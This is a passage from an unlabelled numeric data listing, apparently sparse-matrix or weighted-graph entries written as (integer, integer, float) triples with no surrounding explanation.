(262, 568, 1.68021),
(306, 568, 1.68021),
(168, 568, 2.05359),
(254, 568, 2.80035),
(193, 568, 3.17373),
(241, 568, 3.36042),
(174, 568, 3.7338),
(31, 569, 0.88669),
(159, 569, 0.88669),
(160, 569, 0.88669),
(178, 569, 0.88669),
(193, 569, 0.88669),
(237, 569, 0.88669),
(239, 569, 0.88669),
(241, 569, 0.88669),
(250, 569, 0.88669),
(251, 569, 0.88669),
(257, 569, 0.88669),
(264, 569, 0.88669),
(292, 569, 0.88669),
(305, 569, 0.88669),
(174, 569, 1.77338),
(238, 569, 1.77338),
(244, 569, 1.77338),
(274, 569, 1.77338),
(288, 569, 1.77338),
(304, 569, 1.77338),
(254, 569, 3.54676),
(31, 570, 1.00331),
(159, 570, 1.00331),
(160, 570, 1.00331),
(250, 570, 1.00331),
(251, 570, 1.00331),
(254, 570, 1.00331),
(304, 570, 1.00331),
(31, 572, 0.32669),
(160, 572, 0.32669),
(235, 572, 0.32669),
(236, 572, 0.32669),
(238, 572, 0.32669),
(247, 572, 0.32669),
(250, 572, 0.32669),
(251, 572, 0.32669),
(253, 572, 0.32669),
(255, 572, 0.32669),
(261, 572, 0.32669),
(264, 572, 0.32669),
(272, 572, 0.32669),
(280, 572, 0.32669),
(287, 572, 0.32669),
(161, 572, 0.65338),
(257, 572, 0.65338),
(263, 572, 0.65338),
(275, 572, 0.65338),
(178, 572, 0.98007),
(239, 572, 0.98007),
(31, 573, 0.91),
(160, 573, 0.91),
(250, 573, 0.91),
(251, 573, 0.91),
(287, 573, 0.91),
(31, 574, 1.07331),
(160, 574, 1.07331),
(250, 574, 1.07331),
(251, 574, 1.07331),
(241, 575, 0.23331),
(244, 575, 0.23331),
(246, 575, 0.23331),
(247, 575, 0.23331),
(248, 575, 0.23331),
(258, 575, 0.23331),
(295, 575, 0.23331),
(304, 575, 0.23331),
(305, 575, 0.23331),
(31, 575, 0.46662),
(159, 575, 0.46662),
(160, 575, 0.46662),
(250, 575, 0.46662),
(251, 575, 0.46662),
(292, 575, 0.69993),
(299, 575, 0.93324),
(239, 575, 1.03323),
(242, 575, 1.26654),
(240, 575, 1.96647),
(31, 576, 1.86662),
(159, 576, 1.86662),
(160, 576, 1.86662),
(250, 576, 1.86662),
(251, 576, 1.86662),
(31, 577, 2.05338),
(159, 577, 2.05338),
(160, 577, 2.05338),
(250, 577, 2.05338),
(251, 577, 2.05338),
(31, 578, 0.23331),
(250, 578, 0.23331),
(251, 578, 0.23331),
(268, 578, 2.56641),
(31, 579, 0.91),
(250, 579, 0.91),
(251, 579, 0.91),
(268, 579, 1.82),
(31, 580, 1.00331),
(250, 580, 1.00331),
(251, 580, 1.00331),
(161, 1769, 0.18669),
(239, 1769, 0.18669),
(241, 1769, 0.18669),
(243, 1769, 0.18669),
(248, 1769, 0.18669),
(257, 1769, 0.18669),
(258, 1769, 0.18669),
(263, 1769, 0.18669),
(274, 1769, 0.18669),
(275, 1769, 0.18669),
(288, 1769, 0.18669),
(305, 1769, 0.18669),
(168, 1769, 0.37338),
(193, 1769, 0.37338),
(255, 1769, 0.37338),
(261, 1769, 0.56007),
(178, 1769, 1.12014),
(251, 1769, 1.52019),
(305, 1772, 0.02919),
(161, 1772, 0.23331),
(239, 1772, 0.23331),
(243, 1772, 0.23331),
(255, 1772, 0.23331),
(262, 1772, 0.23331),
(263, 1772, 0.23331),
(268, 1772, 0.23331),
(269, 1772, 0.23331),
(290, 1772, 0.23331),
(306, 1772, 0.23331),
(178, 1772, 0.46662),
(233, 1772, 0.46662),
(235, 1772, 0.46662),
(246, 1772, 0.46662),
(248, 1772, 0.46662),
(265, 1772, 0.46662),
(266, 1772, 0.46662),
(288, 1772, 0.46662),
(236, 1772, 0.69993),
(240, 1772, 0.69993),
(242, 1772, 0.69993),
(244, 1772, 1.16655),
(301, 1784, 0.06993),
(298, 1784, 0.09324),
(299, 1784, 0.18648),
(244, 1784, 0.18669),
(245, 1784, 0.18669),
(249, 1784, 0.18669),
(273, 1784, 0.18669),
(305, 1784, 0.20979),
(304, 1784, 0.25641),
(241, 1784, 0.37338),
(258, 1784, 0.37338),
(259, 1784, 0.37338),
(260, 1784, 0.37338),
(264, 1784, 0.37338),
(268, 1784, 0.37338),
(274, 1784, 0.37338),
(237, 1784, 0.56007),
(246, 1784, 0.56007),
(253, 1784, 0.56007),
(263, 1784, 0.56007),
(269, 1784, 0.56007),
(270, 1784, 0.56007),
(272, 1784, 0.56007),
(275, 1784, 0.56007),
(280, 1784, 0.56007),
(168, 1784, 0.74676),
(235, 1784, 0.74676),
(239, 1784, 0.74676),
(240, 1784, 0.74676),
(243, 1784, 0.74676),
(248, 1784, 0.74676),
(292, 1784, 0.74676),
(306, 1784, 0.74676),
(308, 1784, 0.74676),
(238, 1784, 0.93345),
(255, 1784, 0.93345),
(257, 1784, 0.93345),
(178, 1784, 1.12014),
(254, 1784, 1.12014),
(290, 1784, 1.12014),
(161, 1784, 1.30683),
(236, 1784, 1.30683),
(261, 1784, 1.30683),
(262, 1784, 1.30683),
(265, 1784, 1.30683),
(266, 1784, 1.30683),
(174, 1784, 1.49352),
(256, 1784, 1.68021),
(252, 1784, 1.76022),
(193, 1784, 1.8669),
(242, 1784, 2.98704),
(267, 1784, 3.54711),
(288, 1784, 4.56057),
(193, 1803, 0.32669),
(243, 1803, 0.32669),
(264, 1803, 0.32669),
(268, 1803, 0.32669),
(272, 1803, 0.32669),
(280, 1803, 0.32669),
(304, 1803, 0.32669),
(161, 1803, 0.65338),
(252, 1803, 0.79339),
(301, 11561, 0.035),
(263, 11561, 0.28),
(268, 11561, 0.28),
(270, 11561, 0.28),
(275, 11561, 0.28),
(31, 11561, 2.28),
(258, 11581, 0.37331),
(275, 11581, 0.37331),
(288, 11581, 0.37331),
(305, 11581, 0.37331),
(238, 11581, 0.74662),
(268, 11581, 0.74662),
(160, 11581, 3.03981),
(298, 13370, 0.02331),
(299, 13370, 0.02331),
(305, 13370, 0.06993),
(174, 13370, 0.18669),
(238, 13370, 0.18669),
(240, 13370, 0.18669),
(242, 13370, 0.18669),
(243, 13370, 0.18669),
(245, 13370, 0.18669),
(253, 13370, 0.18669),
(258, 13370, 0.18669),
(274, 13370, 0.18669),
(308, 13370, 0.18669),
(252, 13370, 0.37338),
(261, 13370, 0.37338),
(264, 13370, 0.37338),
(174, 13371, 0.86331),
(238, 13371, 0.86331),
(240, 13371, 0.86331),
(245, 13371, 0.86331),
(253, 13371, 0.86331),
(261, 13371, 0.86331),
(298, 13371, 0.86331),
(299, 13371, 0.86331),
(308, 13371, 0.86331),
(252, 13371, 1.72662),
(305, 13371, 1.72662),
(243, 13375, 0.93331),
(252, 13375, 0.93331),
(240, 13376, 0.86331),
(242, 13376, 0.86331),
(252, 13376, 0.86331),
(237, 13378, 0.86331),
(252, 13378, 0.86331),
(265, 13378, 1.72662),
(266, 13378, 1.72662),
(178, 13380, 0.86331),
(235, 13380, 0.86331),
(237, 13380, 0.86331),
(243, 13380, 0.86331),
(245, 13380, 0.86331),
(246, 13380, 0.86331),
(261, 13380, 0.86331),
(272, 13380, 0.86331),
(274, 13380, 0.86331),
(280, 13380, 0.86331),
(306, 13380, 0.86331),
(174, 13380, 1.72662),
(255, 13380, 1.72662),
(241, 13380, 2.58993),
(252, 13380, 3.45324),
(241, 13383, 0.95669),
(261, 13383, 0.95669),
(274, 13383, 0.95669),
(252, 13383, 1.91338),
(193, 13384, 0.88669),
(239, 13384, 0.88669),
(240, 13384, 0.88669),
(246, 13384, 0.88669),
(256, 13384, 0.88669),
(263, 13384, 0.88669),
(304, 13384, 0.88669),
(305, 13384, 0.88669),
(306, 13384, 0.88669),
(241, 13384, 1.77338),
(252, 13384, 1.77338),
(254, 13384, 1.77338),
(261, 13384, 1.77338),
(242, 13384, 2.66007),
(268, 13384, 2.66007),
(239, 13385, 0.98),
(241, 13385, 0.98),
(252, 13385, 0.98),
(306, 13385, 0.98),
(254, 13385, 1.96),
(237, 13387, 0.37331),
(241, 13387, 0.37331),
(252, 13387, 0.37331),
(253, 13387, 0.37331),
(273, 13387, 0.37331),
(306, 13387, 0.37331),
(241, 13388, 0.98),
(252, 13388, 0.98),
(304, 13390, 0.02331),
(299, 13390, 0.04662),
(301, 13390, 0.04662),
(305, 13390, 0.11655),
(235, 13390, 0.18669),
(236, 13390, 0.18669),
(249, 13390, 0.18669),
(253, 13390, 0.18669),
(272, 13390, 0.18669),
(280, 13390, 0.18669),
(168, 13390, 0.37338),
(193, 13390, 0.37338),
(244, 13390, 0.37338),
(246, 13390, 0.37338),
(248, 13390, 0.37338),
(255, 13390, 0.37338),
(263, 13390, 0.37338),
(264, 13390, 0.37338),
(267, 13390, 0.37338),
(268, 13390, 0.37338),
(269, 13390, 0.37338),
(270, 13390, 0.37338),
(174, 13390, 0.56007),
(237, 13390, 0.56007),
(238, 13390, 0.56007),
(239, 13390, 0.56007),
(240, 13390, 0.56007),
(243, 13390, 0.56007),
(254, 13390, 0.56007),
(257, 13390, 0.56007),
(275, 13390, 0.56007),
(288, 13390, 0.56007),
(252, 13390, 0.74676),
(259, 13390, 0.74676),
(260, 13390, 0.74676),
(292, 13390, 0.74676),
(241, 13390, 0.93345),
(256, 13390, 0.93345),
(261, 13390, 0.93345),
(265, 13390, 0.93345),
(266, 13390, 0.93345),
(242, 13390, 1.12014),
(258, 13390, 1.12014),
(306, 13390, 1.12014),
(178, 13390, 1.49352),
(252, 13391, 0.84),
(258, 13391, 0.84),
(269, 13391, 0.84),
(178, 13391, 1.68),
(292, 13391, 1.68),
(168, 13393, 0.88669),
(193, 13393, 0.88669),
(236, 13393, 0.88669),
(241, 13393, 0.88669),
(244, 13393, 0.88669),
(246, 13393, 0.88669),
(248, 13393, 0.88669),
(256, 13393, 0.88669),
(258, 13393, 0.88669),
(264, 13393, 0.88669),
(265, 13393, 0.88669),
(266, 13393, 0.88669),
(267, 13393, 0.88669),
(269, 13393, 0.88669),
(272, 13393, 0.88669),
(275, 13393, 0.88669),
(280, 13393, 0.88669),
(288, 13393, 0.88669),
(305, 13393, 0.88669),
(237, 13393, 1.77338),
(239, 13393, 1.77338),
(268, 13393, 1.77338),
(270, 13393, 1.77338),
(301, 13393, 1.77338),
(252, 13393, 2.66007),
(259, 13393, 2.66007),
(260, 13393, 2.66007),
(306, 13393, 2.66007),
(237, 13394, 0.98),
(256, 13394, 0.98),
(259, 13394, 0.98),
(260, 13394, 0.98),
(265, 13394, 0.98),
(266, 13394, 0.98),
(270, 13394, 0.98),
(301, 13394, 0.98),
(252, 13394, 1.96),
(193, 13396, 0.23331),
(242, 13396, 0.23331),
(252, 13396, 0.23331),
(254, 13396, 0.23331),
(261, 13396, 0.23331),
(272, 13396, 0.23331),
(280, 13396, 0.23331),
(288, 13396, 0.23331),
(306, 13396, 0.23331),
(274, 13396, 0.46662),
(168, 13399, 0.86331),
(178, 13399, 0.86331),
(193, 13399, 0.86331),
(241, 13399, 0.86331),
(255, 13399, 0.86331),
(252, 13399, 1.72662),
(254, 13399, 1.72662),
(236, 13401, 0.86331),
(264, 13401, 0.86331),
(252, 13401, 1.72662),
(236, 13402, 0.95669),
(264, 13402, 0.95669),
(252, 13402, 1.91338),
(174, 13405, 0.88669),
(193, 13405, 0.88669),
(236, 13405, 0.88669),
(237, 13405, 0.88669),
(240, 13405, 0.88669),
(243, 13405, 0.88669),
(306, 13405, 0.88669),
(239, 13405, 1.77338),
(262, 13405, 1.77338),
(265, 13405, 1.77338),
(266, 13405, 1.77338),
(242, 13405, 2.66007),
(252, 13405, 2.66007),
(267, 13405, 2.66007),
(288, 13405, 17.2271),
(252, 13408, 0.98),
(265, 13408, 0.98),
(266, 13408, 0.98),
(288, 13408, 0.98),
(174, 13409, 0.95669),
(238, 13409, 0.95669),
(242, 13409, 0.95669),
(252, 13409, 0.95669),
(174, 13411, 0.88669),
(238, 13411, 0.88669),
(245, 13411, 0.88669),
(252, 13411, 0.88669),
(253, 13411, 0.88669),
(254, 13411, 0.88669),
(255, 13411, 0.88669),
(257, 13411, 0.88669),
(261, 13411, 0.88669),
(265, 13411, 0.88669),
(266, 13411, 0.88669),
(268, 13411, 0.88669),
(272, 13411, 0.88669),
(275, 13411, 0.88669),
(280, 13411, 0.88669),
(298, 13411, 0.88669),
(304, 13411, 0.88669),
(308, 13411, 0.88669),
(236, 13411, 1.77338),
(240, 13411, 1.77338),
(242, 13411, 1.77338),
(267, 13411, 1.77338),
(270, 13411, 1.77338),
(292, 13411, 1.77338),
(299, 13411, 1.77338),
(301, 13411, 1.77338),
(306, 13411, 1.77338),
(178, 13411, 2.66007),
(235, 13411, 2.66007),
(288, 13411, 2.66007),
(193, 13411, 3.54676),
(256, 13411, 3.54676),
(305, 13411, 3.54676),
(265, 13413, 0.86331),
(266, 13413, 0.86331),
(252, 13413, 1.72662),
(178, 13416, 0.23331),
(233, 13416, 0.23331),
(252, 13416, 0.23331),
(254, 13416, 0.23331),
(256, 13416, 0.23331),
(257, 13416, 0.23331),
(298, 13416, 0.23331),
(308, 13416, 0.23331),
(255, 13416, 0.46662),
(242, 13416, 0.93324),
(237, 13416, 1.16655),
(265, 13416, 1.16655),
(266, 13416, 1.16655),
(174, 13419, 0.18669),
(193, 13419, 0.18669),
(236, 13419, 0.18669),
(238, 13419, 0.18669),
(242, 13419, 0.18669),
(246, 13419, 0.18669),
(252, 13419, 0.18669),
(253, 13419, 0.18669),
(262, 13419, 0.18669),
(265, 13419, 0.18669),
(266, 13419, 0.18669),
(268, 13419, 0.18669),
(290, 13419, 0.18669),
(299, 13419, 0.18669),
(304, 13419, 0.18669),
(305, 13419, 0.18669),
(168, 13419, 0.37338),
(237, 13419, 0.37338),
(239, 13419, 0.37338),
(240, 13419, 0.37338),
(267, 13419, 0.37338),
(243, 13419, 0.56007),
(255, 13419, 0.56007),
(241, 13419, 0.74676),
(193, 13420, 0.86331),
(236, 13420, 0.86331),
(243, 13420, 0.86331),
(252, 13420, 0.86331),
(290, 13420, 0.86331),
(193, 13421, 0.95669),
(243, 13421, 0.95669),
(252, 13421, 0.95669),
(252, 13422, 0.23331),
(275, 13422, 0.23331),
(174, 13425, 0.32669),
(236, 13425, 0.32669),
(237, 13425, 0.32669),
(252, 13425, 0.32669),
(262, 13425, 0.32669),
(178, 13425, 0.98007),
(193, 17227, 0.18669),
(236, 17227, 0.18669),
(239, 17227, 0.18669),
(242, 17227, 0.18669),
(247, 17227, 0.18669),
(256, 17227, 0.18669),
(258, 17227, 0.18669),
(264, 17227, 0.18669),
(275, 17227, 0.18669),
(299, 17227, 0.18669),
(235, 17227, 0.37338),
(240, 17227, 0.37338),
(248, 17227, 0.37338),
(267, 17227, 0.37338),
(273, 17227, 0.37338),
(304, 17227, 0.37338),
(255, 17227, 0.56007),
(298, 17227, 0.56007),
(308, 17227, 0.56007),
(265, 17227, 0.74676),
(266, 17227, 0.74676),
(243, 17227, 0.93345),
(262, 17227, 2.24028),
(235, 21302, 0.88669),
(236, 21302, 0.88669),
(239, 21302, 0.88669),
(240, 21302, 0.88669),
(255, 21302, 0.88669),
(288, 21302, 0.88669),
(233, 21302, 1.77338),
(246, 21302, 1.77338),
(236, 21303, 0.98),
(288, 21303, 0.98),
(233, 21303, 1.96),
(233, 21304, 0.93331),
(255, 21304, 0.93331),
(233, 21305, 1.00331),
(255, 21305, 1.00331),
(275, 24290, 0.93331),
(299, 24290, 0.93331),
(306, 24290, 0.93331),
(299, 24291, 0.02331),
(237, 24291, 0.18669),
(243, 24291, 0.18669),
(262, 24291, 0.18669),
(267, 24291, 0.18669),
(273, 24291, 0.18669),
(292, 24291, 0.18669),
(241, 24291, 0.37338),
(242, 24291, 0.37338),
(246, 24291, 0.37338),
(306, 24291, 0.37338),
(178, 24291, 0.74676),
(239, 24298, 0.88669),
(254, 24298, 0.88669),
(256, 24298, 0.88669),
(299, 24298, 0.88669),
(305, 24298, 0.88669),
(239, 24299, 1.02669),
(299, 24299, 1.02669),
(178, 24300, 0.86331),
(240, 24300, 0.86331),
(255, 24300, 0.86331),
(263, 24300, 0.86331),
(265, 24300, 0.86331),
(266, 24300, 0.86331),
(299, 24300, 0.86331),
(242, 24300, 1.72662),
(235, 24302, 0.88669),
(241, 24302, 0.88669),
(244, 24302, 0.88669),
(253, 24302, 0.88669),
(254, 24302, 0.88669),
(259, 24302, 0.88669),
(260, 24302, 0.88669),
(265, 24302, 0.88669),
(266, 24302, 0.88669),
(288, 24302, 0.88669),
(292, 24302, 0.88669),
(299, 24302, 0.88669),
(304, 24302, 0.88669),
(174, 24302, 1.77338),
(256, 24302, 2.66007),
(244, 24303, 1.02669),
(299, 24303, 1.02669),
(174, 24304, 0.32669),
(237, 24304, 0.32669),
(246, 24304, 0.32669),
(247, 24304, 0.32669),
(257, 24304, 0.32669),
(262, 24304, 0.32669),
(264, 24304, 0.32669),
(270, 24304, 0.32669),
(299, 24304, 0.32669),
(301, 24304, 0.32669),
(304, 24304, 0.32669),
(306, 24304, 0.98007),
(174, 24307, 0.23331),
(299, 24307, 0.23331),
(305, 24310, 0.0175),
(174, 24310, 0.14),
(235, 24310, 0.14),
(236, 24310, 0.14),
(238, 24310, 0.14),
(254, 24310, 0.14),
(257, 24310, 0.14),
(258, 24310, 0.14),
(261, 24310, 0.14),
(267, 24310, 0.14),
(269, 24310, 0.14),
(274, 24310, 0.14),
(299, 24310, 0.1775),
(193, 24310, 0.28),
(239, 24310, 0.28),
(242, 24310, 0.28),
(249, 24310, 0.28),
(259, 24310, 0.28),
(260, 24310, 0.28),
(272, 24310, 0.28),
(280, 24310, 0.28),
(178, 24310, 0.42),
(262, 24310, 0.42),
(306, 24310, 0.42),
(243, 24310, 0.56),
(253, 24310, 0.56),
(288, 24310, 0.56),
(273, 24310, 0.7),
(292, 24310, 0.84),
(240, 24310, 1.12),
(246, 24310, 1.26),
(174, 24313, 0.84),
(243, 24313, 0.84),
(257, 24313, 0.84),
(261, 24313, 0.84),
(267, 24313, 0.84),
(246, 24313, 2.52),
(299, 24313, 6.84),
(263, 24317, 0.23331),
(299, 24317, 0.46662),
(299, 24322, 0.02331),
(235, 24322, 0.18669),
(244, 24322, 0.18669),
(258, 24322, 0.18669),
(292, 24322, 0.37338),
(262, 24325, 0.88669),
(299, 24325, 0.88669),
(238, 24327, 0.88669),
(241, 24327, 0.88669),
(292, 24327, 0.88669),
(299, 24327, 0.88669),
(255, 24332, 0.88669),
(257, 24332, 0.88669),
(299, 24332, 0.88669),
(242, 24332, 1.77338),
(305, 24332, 1.77338),
(168, 24332, 2.66007),
(267, 24332, 2.66007),
(168, 24333, 0.98),
(178, 24334, 0.86331),
(299, 24334, 1.72662),
(193, 24343, 0.91),
(256, 24343, 0.91),
(259, 24343, 0.91),
(260, 24343, 0.91),
(261, 24343, 0.91),
(265, 24343, 0.91),
(266, 24343, 0.91),
(267, 24343, 0.91),
(269, 24343, 0.91),
(299, 24343, 0.91),
(304, 24343, 0.91),
(306, 24343, 0.91),
(240, 24345, 0.23331),
(273, 24345, 0.23331),
(299, 24345, 0.23331),
(178, 24345, 0.69993),
(256, 24348, 0.86331),
(299, 24348, 0.86331),
(168, 24350, 0.86331),
(237, 24350, 0.86331),
(268, 24350, 0.86331),
(299, 24350, 0.86331),
(178, 24352, 0.23331),
(238, 24352, 0.23331),
(239, 24352, 0.23331),
(254, 24352, 0.23331),
(256, 24352, 0.23331),
(263, 24352, 0.23331),
(269, 24352, 0.23331),
(272, 24352, 0.23331),
(280, 24352, 0.23331),
(299, 24352, 0.23331),
(236, 24352, 0.46662),
(240, 24355, 0.91),
(242, 24355, 0.91),
(246, 24355, 0.91),
(299, 24355, 0.91),
(258, 24359, 0.91),
(299, 24359, 0.91),
(241, 24361, 0.88669),
(299, 24361, 0.88669),
(168, 25459, 0.18669),
(240, 25459, 0.18669),
(242, 25459, 0.18669),
(255, 25459, 0.18669),
(258, 25459, 0.18669),
(264, 25459, 0.18669),
(273, 25459, 0.18669),
(290, 25459, 0.18669),
(298, 25459, 0.18669),
(306, 25459, 0.18669),
(308, 25459, 0.18669),
(243, 25459, 0.37338),
(305, 25459, 0.37338),
(239, 25459, 0.56007),
(239, 25460, 0.91),
(242, 25460, 0.91),
(243, 25460, 0.91),
(255, 25460, 0.91),
(298, 25460, 0.91),
(305, 25460, 0.91),
(308, 25460, 0.91),
(261, 25462, 1.00331),
(298, 25462, 1.00331),
(308, 25462, 1.00331),
(237, 25463, 0.18669),
(242, 25463, 0.18669),
(244, 25463, 0.18669),
(247, 25463, 0.18669),
(262, 25463, 0.18669),
(290, 25463, 0.18669),
(304, 25463, 0.18669),
(305, 25463, 0.18669),
(298, 25463, 0.64008),
(308, 25463, 0.64008),
(237, 25464, 0.91),
(242, 25464, 0.91),
(298, 25464, 0.91),
(308, 25464, 0.91),
(237, 25465, 1.00331),
(298, 25465, 1.00331),
(308, 25465, 1.00331),
(262, 25466, 0.86331),
(304, 25466, 0.86331),
(298, 25466, 2.09661),
(308, 25466, 2.09661),
(236, 25472, 1.00331),
(267, 25472, 1.00331),
(292, 25472, 1.00331),
(298, 25472, 1.00331),
(308, 25472, 1.00331),
(288, 25472, 3.00993),
(174, 25473, 0.91),
(236, 25473, 0.91),
(246, 25473, 0.91),
(256, 25473, 0.91),
(257, 25473, 0.91),
(298, 25473, 0.91),
(308, 25473, 0.91),
(267, 25473, 1.82),
(248, 25475, 0.88669),
(255, 25475, 0.88669),
(256, 25475, 0.88669),
(261, 25475, 0.88669),
(263, 25475, 0.88669),
(288, 25475, 0.88669),
(298, 25475, 0.88669),
(304, 25475, 0.88669),
(305, 25475, 0.88669),
(308, 25475, 0.88669),
(243, 25475, 1.77338),
(257, 25475, 1.77338),
(267, 25475, 1.77338),
(235, 25477, 0.86331),
(236, 25477, 0.86331),
(255, 25477, 0.86331),
(267, 25477, 0.86331),
(273, 25477, 0.86331),
(275, 25477, 0.86331),
(304, 25477, 1.72662),
(243, 25477, 2.58993),
(298, 25477, 2.58993),
(308, 25477, 2.58993),
(235, 25478, 0.95669),
(236, 25478, 0.95669),
(255, 25478, 0.95669),
(267, 25478, 0.95669),
(275, 25478, 0.95669),
(304, 25478, 1.91338),
(243, 25478, 2.87007),
(298, 25478, 2.87007),
(308, 25478, 2.87007),
(235, 25484, 0.23331),
(290, 25484, 0.23331),
(298, 25484, 0.23331),
(305, 25484, 0.23331),
(308, 25484, 0.23331),
(237, 25487, 0.23331),
(246, 25487, 0.23331),
(249, 25487, 0.23331),
(257, 25487, 0.23331),
(258, 25487, 0.23331),
(267, 25487, 0.23331),
(290, 25487, 0.23331),
(298, 25487, 0.23331),
(304, 25487, 0.23331),
(308, 25487, 0.23331),
(254, 25487, 0.46662),
(306, 25487, 0.46662),
(174, 25487, 0.69993),
(263, 25487, 0.69993),
(261, 25999, 0.23331),
(168, 25999, 0.39996),
(174, 25999, 0.39996),
(242, 25999, 0.46662),
(253, 25999, 0.46662),
(46, 25999, 0.56661),
(178, 25999, 1.43319),
(46, 26000, 2.49339),
(287, 26032, 0.32669),
(48, 26032, 1.44677),
(48, 26033, 4.65),
(48, 26034, 5.58),
(178, 28975, 0.86331),
(238, 28975, 0.86331),
(241, 28975, 0.86331),
(248, 28975, 0.86331),
(249, 28975, 0.86331),
(253, 28975, 0.86331),
(255, 28975, 0.86331),
(257, 28975, 0.86331),
(259, 28975, 0.86331),
(260, 28975, 0.86331),
(265, 28975, 0.86331),
(266, 28975, 0.86331),
(288, 28975, 0.86331),
(305, 28975, 0.86331),
(174, 28975, 1.72662),
(258, 28975, 1.72662),
(262, 28975, 1.72662),
(263, 28975, 1.72662),
(292, 28975, 1.72662),
(295, 28975, 1.72662),
(306, 28975, 1.72662),
(193, 28975, 2.58993),
(261, 28975, 2.58993),
(168, 28975, 3.45324),
(193, 32969, 0.91),
(254, 32969, 0.91),
(193, 32977, 0.91),
(254, 32977, 0.91),
(261, 32977, 0.91),
(193, 32978, 1.00331),
(254, 32978, 1.00331),
(261, 32978, 1.00331),
(253, 37120, 0.86331),
(256, 37120, 0.86331),
(301, 37125, 0.02919),
(305, 37125, 0.02919),
(239, 37125, 0.23331),
(240, 37125, 0.23331),
(241, 37125, 0.23331),
(243, 37125, 0.23331),
(245, 37125, 0.23331),
(247, 37125, 0.23331),
(253, 37125, 0.23331),
(254, 37125, 0.23331),
(257, 37125, 0.23331),
(264, 37125, 0.23331),
(270, 37125, 0.23331),
(275, 37125, 0.23331),
(292, 37125, 0.23331),
(259, 37125, 0.46662),
(260, 37125, 0.46662),
(274, 37125, 0.46662),
(306, 37125, 0.93324),
(174, 37125, 1.16655),
(253, 37134, 0.88669),
(258, 37134, 0.88669),
(305, 37134, 0.88669),
(292, 37134, 1.77338),
(174, 37136, 0.18669),
(178, 37136, 0.18669),
(253, 37136, 0.18669),
(268, 37136, 0.37338),
(246, 37140, 0.91),
(253, 37140, 0.91),
(254, 37140, 0.91),
(290, 37140, 0.91),
(241, 37140, 1.82),
(237, 37142, 0.14),
(240, 37142, 0.14),
(241, 37142, 0.14),
(253, 37142, 0.14),
(254, 37142, 0.14),
(255, 37142, 0.14),
(256, 37142, 0.14),
(258, 37142, 0.14),
(259, 37142, 0.14),
(260, 37142, 0.14),
(261, 37142, 0.14),
(262, 37142, 0.14),
(263, 37142, 0.14),
(265, 37142, 0.14),
(266, 37142, 0.14),
(267, 37142, 0.14),
(268, 37142, 0.14),
(269, 37142, 0.14),
(270, 37142, 0.14),
(272, 37142, 0.14),
(273, 37142, 0.14),
(274, 37142, 0.14),
(275, 37142, 0.14),
(280, 37142, 0.14),
(287, 37142, 0.14),
(288, 37142, 0.14),
(292, 37142, 0.14),
(301, 37142, 0.14),
(304, 37142, 0.14),
(264, 37142, 0.28),
(305, 37142, 0.56),
(241, 37143, 0.88669),
(253, 37143, 0.88669),
(254, 37143, 0.88669),
(255, 37143, 0.88669),
(256, 37143, 0.88669),
(258, 37143, 0.88669),
(259, 37143, 0.88669),
(260, 37143, 0.88669),
(261, 37143, 0.88669),
(262, 37143, 0.88669),
(263, 37143, 0.88669),
(265, 37143, 0.88669),
(266, 37143, 0.88669),
(267, 37143, 0.88669),
(268, 37143, 0.88669),
(269, 37143, 0.88669),
(270, 37143, 0.88669),
(272, 37143, 0.88669),
(273, 37143, 0.88669),
(274, 37143, 0.88669),
(275, 37143, 0.88669),
(280, 37143, 0.88669),
(288, 37143, 0.88669),
(292, 37143, 0.88669),
(301, 37143, 0.88669),
(304, 37143, 0.88669),
(305, 37143, 0.88669),
(264, 37143, 1.77338),
(241, 37144, 1.02669),
(253, 37144, 1.02669),
(254, 37144, 1.02669),
(255, 37144, 1.02669),
(256, 37144, 1.02669),
(258, 37144, 1.02669),
(259, 37144, 1.02669),
(260, 37144, 1.02669),
(261, 37144, 1.02669),
(262, 37144, 1.02669),
(263, 37144, 1.02669),
(264, 37144, 1.02669),
(265, 37144, 1.02669),
(266, 37144, 1.02669),
(267, 37144, 1.02669),
(268, 37144, 1.02669),
(269, 37144, 1.02669),
(270, 37144, 1.02669),
(272, 37144, 1.02669),
(273, 37144, 1.02669),
(274, 37144, 1.02669),
(275, 37144, 1.02669),
(280, 37144, 1.02669),
(288, 37144, 1.02669),
(292, 37144, 1.02669),
(301, 37144, 1.02669),
(304, 37144, 1.02669),
(305, 37144, 1.02669),
(236, 37145, 0.88669),
(253, 37145, 0.88669),
(255, 37145, 0.88669),
(265, 37145, 0.88669),
(266, 37145, 0.88669),
(292, 37145, 0.88669),
(241, 37147, 0.93331),
(253, 37147, 0.93331),
(254, 37147, 0.93331),
(255, 37147, 0.93331),
(256, 37147, 0.93331),
(258, 37147, 0.93331),
(259, 37147, 0.93331),
(260, 37147, 0.93331),
(261, 37147, 0.93331),
(262, 37147, 0.93331),
(263, 37147, 0.93331),
(264, 37147, 0.93331),
(265, 37147, 0.93331),
(266, 37147, 0.93331),
(268, 37147, 0.93331),
(269, 37147, 0.93331),
(270, 37147, 0.93331),
(272, 37147, 0.93331),
(273, 37147, 0.93331),
(274, 37147, 0.93331),
(275, 37147, 0.93331),
(280, 37147, 0.93331),
(288, 37147, 0.93331),
(292, 37147, 0.93331),
(301, 37147, 0.93331),
(304, 37147, 0.93331),
(305, 37147, 0.93331),
(267, 37147, 1.86662),
(241, 37148, 1.07331),
(253, 37148, 1.07331),
(254, 37148, 1.07331),
(255, 37148, 1.07331),
(258, 37148, 1.07331),
(259, 37148, 1.07331),
(260, 37148, 1.07331),
(261, 37148, 1.07331),
(262, 37148, 1.07331),
(263, 37148, 1.07331),
(264, 37148, 1.07331),
(268, 37148, 1.07331),
(269, 37148, 1.07331),
(270, 37148, 1.07331),
(272, 37148, 1.07331),
(273, 37148, 1.07331),
(274, 37148, 1.07331),
(275, 37148, 1.07331),
(280, 37148, 1.07331),
(288, 37148, 1.07331),
(292, 37148, 1.07331),
(301, 37148, 1.07331),
(304, 37148, 1.07331),
(305, 37148, 1.07331),
(178, 51545, 0.23331),
(235, 51545, 0.23331),
(238, 51545, 0.23331),
(239, 51545, 0.23331),
(273, 51545, 0.23331),
(235, 51556, 0.86331),
(262, 51556, 0.86331),
(269, 51556, 0.86331),
(246, 51556, 3.45324),
(301, 51560, 0.0175),
(304, 51560, 0.0175),
(247, 51560, 0.14),
(257, 51560, 0.14),
(261, 51560, 0.14),
(268, 51560, 0.14),
(270, 51560, 0.14),
(272, 51560, 0.14),
(274, 51560, 0.14),
(280, 51560, 0.14),
(306, 51560, 0.14),
(174, 51560, 0.28),
(235, 51560, 0.28),
(239, 51560, 0.28),
(273, 51560, 0.28),
(235, 51567, 0.91),
(238, 51567, 0.91),
(241, 51567, 0.91),
(243, 51567, 0.91),
(255, 51567, 0.91),
(305, 51567, 0.91),
